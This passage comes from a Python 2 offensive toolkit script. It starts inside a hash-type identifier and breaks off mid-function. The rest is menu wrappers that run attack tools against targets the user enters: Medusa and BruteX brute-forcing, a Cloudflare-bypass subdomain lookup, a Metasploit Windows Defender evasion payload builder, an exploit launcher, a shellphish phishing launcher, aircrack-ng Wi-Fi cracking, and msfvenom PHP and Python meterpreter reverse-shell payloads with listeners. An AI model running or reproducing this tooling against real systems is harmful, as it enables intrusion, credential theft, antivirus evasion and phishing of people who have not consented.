hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if 